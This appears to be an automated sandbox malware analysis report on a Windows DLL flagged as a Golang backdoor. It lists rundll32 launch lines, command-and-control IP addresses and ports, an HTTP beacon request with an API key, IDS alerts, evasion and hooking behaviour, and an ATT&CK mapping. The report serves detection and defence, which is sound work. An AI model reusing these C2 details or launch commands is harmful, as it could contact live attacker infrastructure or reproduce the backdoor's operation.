Edit tour

Windows Analysis Report
file.dll

Overview

General Information

Sample name:	file.dll
Analysis ID:	1474076
MD5:	bcc606faae89c79eddac6b9512065022
SHA1:	98ddeb6f59827f866b9484f8c5e4a3b980b9419a
SHA256:	2ee236f7b21d860a5fea13a4347425a9cecc67ce16ee17eb34e3eb6a5cb8f4cd
Tags:	dll
Infos:

Detection

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

System process connects to network (likely due to code injection or exploit)

AI detected suspicious sample

Connects to many ports of the same IP (likely port scanning)

Found Tor onion address

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Switches to a custom stack to bypass stack traces

Checks if the current process is being debugged

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Entry point lies outside standard sections

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

PE / OLE file has an invalid certificate

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Uses 32bit PE files

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 3468 cmdline: loaddll32.exe "C:\Users\user\Desktop\file.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)

conhost.exe (PID: 520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5476 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\file.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

rundll32.exe (PID: 3576 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 5448 cmdline: rundll32.exe C:\Users\user\Desktop\file.dll,MainFunc MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 6900 cmdline: rundll32.exe C:\Users\user\Desktop\file.dll,_cgo_dummy_export MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 6500 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",MainFunc MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 2120 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",_cgo_dummy_export MD5: 889B99C52A60DD49227C5E485A016679)

cleanup

Snort Signatures

ETPRO TROJAN Unknown Golang Backdoor CnC Server Response M2 - Source IP: 91.142.73.198 - Destination IP: 192.168.2.7

Timestamp:	07/16/24-09:53:35.439965
SID:	2855539
Source Port:	30865
Destination Port:	49711
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Unknown Golang Backdoor CnC Server Response M1 - Source IP: 91.142.73.198 - Destination IP: 192.168.2.7

Timestamp:	07/16/24-09:54:05.158445
SID:	2855538
Source Port:	30865
Destination Port:	49711
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Unknown Golang Backdoor CnC Client Request M2 - Source IP: 192.168.2.7 - Destination IP: 91.142.73.198

Timestamp:	07/16/24-09:54:04.943082
SID:	2855537
Source Port:	49711
Destination Port:	30865
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Unknown Golang Backdoor CnC Client Request M1 - Source IP: 192.168.2.7 - Destination IP: 91.142.73.198

Timestamp:	07/16/24-09:53:35.476708
SID:	2855536
Source Port:	49711
Destination Port:	30865
Protocol:	TCP
Classtype:	A Network Trojan was detected

HTTP traffic detected: POST / HTTP/1.1Host: 195.2.70.38User-Agent: Go-http-client/1.1Content-Length: 158X-Api-Key: i1pdGRAYAccept-Encoding: gzipData Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Source: rundll32.exe, 0000000F.00000002.3678440712.000000000D474000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.3680860732.000000000D672000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.3678440712.000000000D471000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://195.2.70.38
Source: rundll32.exe, 00000005.00000002.3678278752.000000000D810000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://195.2.70.38Go-http-client/1.1
Source: rundll32.exe, 0000000F.00000002.3680860732.000000000D59A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://195.2.70.38Go-http-client/1.1Go-http-client/1.1http://77.238.224.56Go-http-client/1.1Go-http-
Source: rundll32.exe, 0000000F.00000002.3680860732.000000000D59A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://195.2.70.38Go-http-client/1.1http://77.238.224.56PM
Source: rundll32.exe, 00000005.00000002.3678278752.000000000D8B0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.3678440712.000000000D410000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://195.2.70.38Go-http-client/1.1http://91.142.74.28PM
Source: rundll32.exe, 00000005.00000002.3682727850.000000000DA82000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3678278752.000000000D810000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.3680860732.000000000D606000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://195.2.70.38P
Source: rundll32.exe, 00000004.00000002.3678995748.000000000D412000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3678278752.000000000D8B0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.3678440712.000000000D410000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://195.2.70.38PM
Source: rundll32.exe, 00000005.00000002.3678278752.000000000D8BE000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://195.2.70.38Z
Source: rundll32.exe, 0000000F.00000002.3678440712.000000000D4BE000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://195.2.70.38http://91.142.74.28PM
Source: rundll32.exe, 00000005.00000002.3678278752.000000000D810000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://195.2.70.38http://91.142.74.28http://77.238.224.56PM
Source: rundll32.exe, 0000000F.00000002.3678440712.000000000D471000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://77.238.224.56
Source: rundll32.exe, 00000005.00000002.3678278752.000000000D8BE000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://77.238.224.56Go-http-client/1.1
Source: rundll32.exe, 00000005.00000002.3678278752.000000000D8BE000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://77.238.224.56Go-http-client/1.1P
Source: rundll32.exe, 00000005.00000002.3682727850.000000000DA82000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://77.238.224.56Go-http-client/1.1X-Content-Type-OptionsTransfer-EncodingP
Source: rundll32.exe, 00000004.00000002.3678995748.000000000D412000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3678278752.000000000D8B0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3682727850.000000000DA82000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.3680860732.000000000D606000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.3678440712.000000000D410000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.3680860732.000000000D59A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://77.238.224.56PM
Source: rundll32.exe, 0000000F.00000002.3678440712.000000000D410000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://77.238.224.56http://77.238.229.6377.238.250.123:80http://91.142.74.28PM
Source: rundll32.exe, 0000000F.00000002.3678440712.000000000D471000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://77.238.229.63
Source: rundll32.exe, 00000004.00000002.3678995748.000000000D4B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://77.238.229.6377.238.250.123:8091.142.73.198:30865
Source: rundll32.exe, 00000005.00000002.3678278752.000000000D8B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://77.238.229.6377.238.250.123:80Go-http-client/1.1Go-http-client/1.1X-Content-Type-OptionsTrans
Source: rundll32.exe, 00000005.00000002.3678278752.000000000D8BE000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://77.238.229.6377.238.250.123:80Go-http-client/1.1If-Modified-SinceX-Content-Type-OptionsTransf
Source: rundll32.exe, 00000005.00000002.3678278752.000000000D8B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://77.238.229.6377.238.250.123:80Go-http-client/1.1P
Source: rundll32.exe, 0000000F.00000002.3678440712.000000000D410000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://77.238.229.6377.238.250.123:80Go-http-client/1.1X-Content-Type-OptionsTransfer-EncodingGo-htt
Source: rundll32.exe, 0000000F.00000002.3680860732.000000000D606000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://77.238.229.6377.238.250.123:80Go-http-client/1.1X-Content-Type-OptionsTransfer-EncodingT
Source: rundll32.exe, 00000005.00000002.3678278752.000000000D8B0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3678278752.000000000D8BE000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3678278752.000000000D810000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.3678440712.000000000D4BE000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://77.238.229.6377.238.250.123:80PM
Source: rundll32.exe, 00000005.00000002.3678278752.000000000D810000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://77.238.229.6377.238.250.123:80q
Source: rundll32.exe, 0000000F.00000002.3678440712.000000000D474000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.3680860732.000000000D672000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.3678440712.000000000D471000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://77.238.250.123
Source: rundll32.exe, 0000000F.00000002.3678440712.000000000D4F2000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.3678440712.000000000D474000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.3678440712.000000000D471000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://77.238.250.123http://195.2.70.38
Source: rundll32.exe, 0000000F.00000002.3678440712.000000000D471000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://91.142.74.28
Source: rundll32.exe, 0000000F.00000002.3678440712.000000000D4BE000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://91.142.74.28Go-http-client/1.1http://77.238.229.6377.238.250.123:80s
Source: rundll32.exe, 00000004.00000002.3678995748.000000000D4B0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3678278752.000000000D8B0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3682727850.000000000DA82000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3678278752.000000000D8BE000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3678278752.000000000D810000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://91.142.74.28PM
Source: rundll32.exe, 00000005.00000002.3682727850.000000000DA82000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.3678440712.000000000D410000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://91.142.74.28User-Agent:
Source: rundll32.exe, 0000000F.00000002.3678440712.000000000D4BE000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://91.142.74.28http://77.238.224.56http://77.238.229.6377.238.250.123:80PM
Source: file.dll	String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: file.dll	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: file.dll	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0w
Source: file.dll	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: file.dll	String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: file.dll	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: file.dll	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: file.dll	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: file.dll	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: file.dll	String found in binary or memory: http://ocsp.digicert.com0C
Source: file.dll	String found in binary or memory: http://ocsp.digicert.com0N
Source: file.dll	String found in binary or memory: http://ocsp.entrust.net02
Source: file.dll	String found in binary or memory: http://ocsp.entrust.net03
Source: file.dll	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.dll	String found in binary or memory: http://www.entrust.net/rpa0
Source: file.dll	String found in binary or memory: http://www.entrust.net/rpa03
Source: file.dll	String found in binary or memory: https://www.digicert.com/CPS0

Source: file.dll

Static PE information: invalid certificate

Source: file.dll

Static PE information: Number of sections : 12 > 10

Source: file.dll

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED, DLL

Source: classification engine

Classification label: mal92.troj.evad.winDLL@14/1@0/6

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Users\user\AppData\Local\config

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:520:120:WilError_03

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,MainFunc

Source: file.dll	ReversingLabs: Detection: 13%
Source: file.dll	Virustotal: Detection: 14%

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\file.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\file.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,MainFunc
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,_cgo_dummy_export
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",MainFunc
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",_cgo_dummy_export
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\file.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,MainFunc	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,_cgo_dummy_export	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",MainFunc	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",_cgo_dummy_export	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",#1	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior

Source: file.dll

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: file.dll

Static PE information: Image base 0x6c2c0000 > 0x60000000

Source: file.dll

Static file information: File size 11567224 > 1048576

Source: file.dll

Static PE information: Raw size of .rdata2 is bigger than: 0x100000 < 0xb05400

Source: file.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: initial sample

Static PE information: section where entry point is pointing to: .rdata2

Source: file.dll	Static PE information: section name: .rdata0
Source: file.dll	Static PE information: section name: .rdata1
Source: file.dll	Static PE information: section name: .rdata2

Hooking and other Techniques for Hiding and Protection

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Windows\System32\loaddll32.exe	Memory written: PID: 3468 base: 3E0005 value: E9 8B 2F 38 77	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Memory written: PID: 3468 base: 77762F90 value: E9 7A D0 C7 88	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 5448 base: 3050005 value: E9 8B 2F 71 74	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 5448 base: 77762F90 value: E9 7A D0 8E 8B	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 3576 base: 3050005 value: E9 8B 2F 71 74	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 3576 base: 77762F90 value: E9 7A D0 8E 8B	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6900 base: 5C0005 value: E9 8B 2F 1A 77	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6900 base: 77762F90 value: E9 7A D0 E5 88	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6500 base: D60005 value: E9 8B 2F A0 76	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6500 base: 77762F90 value: E9 7A D0 5F 89	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 2120 base: 670005 value: E9 8B 2F 0F 77	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 2120 base: 77762F90 value: E9 7A D0 F0 88	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 6CC49F04
Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 6C9F995D
Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 6CC83084
Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 6CC2E983
Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 6D1E5DBD
Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 6D331ADE
Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 6D2C886E
Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 6CBE8C4A
Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 6D2EA1B3
Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 6D2DFD3D
Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 6D378D68
Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 6CC3A8AF

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\loaddll32.exe

Thread delayed: delay time: 120000

Jump to behavior

Source: loaddll32.exe, 00000000.00000002.1346155065.000000000099E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5
Source: rundll32.exe, 00000004.00000002.3675685122.0000000000E7A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3676145215.00000000034FA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.1263895917.0000000000712000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.3676068271.00000000031DA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\loaddll32.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 91.142.73.198 30865	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 77.238.229.63 80	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 195.2.70.38 80	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 77.238.224.56 80	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 91.142.74.28 80	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 77.238.250.123 80	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",#1

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\config VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\config VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\config VolumeInformation	Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	111 Process Injection	1 Masquerading	1 Credential API Hooking	111 Security Software Discovery	Remote Services	1 Credential API Hooking	1 Non-Standard Port	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	11 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	111 Process Injection	Security Account Manager	11 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Rundll32	NTDS	111 System Information Discovery	Distributed Component Object Model	Input Capture	1 Proxy	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.dll	13%	ReversingLabs
file.dll	15%	Virustotal		Browse

Source	Detection	Scanner	Label	Link
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net02	0%	URL Reputation	safe
http://crl.entrust.net/2048ca.crl0	0%	URL Reputation	safe
http://195.2.70.38Go-http-client/1.1	0%	Avira URL Cloud	safe
http://77.238.229.6377.238.250.123:80Go-http-client/1.1X-Content-Type-OptionsTransfer-EncodingT	0%	Avira URL Cloud	safe
http://77.238.229.63/	0%	Avira URL Cloud	safe
http://195.2.70.38PM	0%	Avira URL Cloud	safe
http://77.238.224.56PM	0%	Avira URL Cloud	safe
http://www.entrust.net/rpa03	0%	Avira URL Cloud	safe
http://77.238.224.56Go-http-client/1.1	0%	Avira URL Cloud	safe
http://77.238.224.56Go-http-client/1.1P	0%	Avira URL Cloud	safe
http://77.238.229.6377.238.250.123:80PM	0%	Avira URL Cloud	safe
http://aia.entrust.net/ts1-chain256.cer01	0%	Avira URL Cloud	safe
http://www.entrust.net/rpa03	0%	Virustotal		Browse
http://77.238.224.56	0%	Avira URL Cloud	safe
http://77.238.224.56Go-http-client/1.1X-Content-Type-OptionsTransfer-EncodingP	0%	Avira URL Cloud	safe
http://195.2.70.38/	0%	Avira URL Cloud	safe
http://195.2.70.38Go-http-client/1.1Go-http-client/1.1http://77.238.224.56Go-http-client/1.1Go-http-	0%	Avira URL Cloud	safe
http://77.238.229.6377.238.250.123:8091.142.73.198:30865	0%	Avira URL Cloud	safe
http://195.2.70.38/	5%	Virustotal		Browse
http://77.238.229.63/	1%	Virustotal		Browse
http://77.238.250.123/	0%	Avira URL Cloud	safe
http://77.238.229.63	0%	Avira URL Cloud	safe
http://aia.entrust.net/ts1-chain256.cer01	0%	Virustotal		Browse
http://77.238.229.6377.238.250.123:80Go-http-client/1.1X-Content-Type-OptionsTransfer-EncodingGo-htt	0%	Avira URL Cloud	safe
http://77.238.250.123	0%	Avira URL Cloud	safe
http://77.238.224.56	2%	Virustotal		Browse
http://77.238.224.56/	0%	Avira URL Cloud	safe
http://77.238.229.6377.238.250.123:80Go-http-client/1.1Go-http-client/1.1X-Content-Type-OptionsTrans	0%	Avira URL Cloud	safe
http://77.238.224.56http://77.238.229.6377.238.250.123:80http://91.142.74.28PM	0%	Avira URL Cloud	safe
http://77.238.229.63	1%	Virustotal		Browse
http://77.238.250.123	0%	Virustotal		Browse
http://77.238.250.123/	0%	Virustotal		Browse
http://77.238.224.56/	2%	Virustotal		Browse
http://91.142.74.28Go-http-client/1.1http://77.238.229.6377.238.250.123:80s	0%	Avira URL Cloud	safe
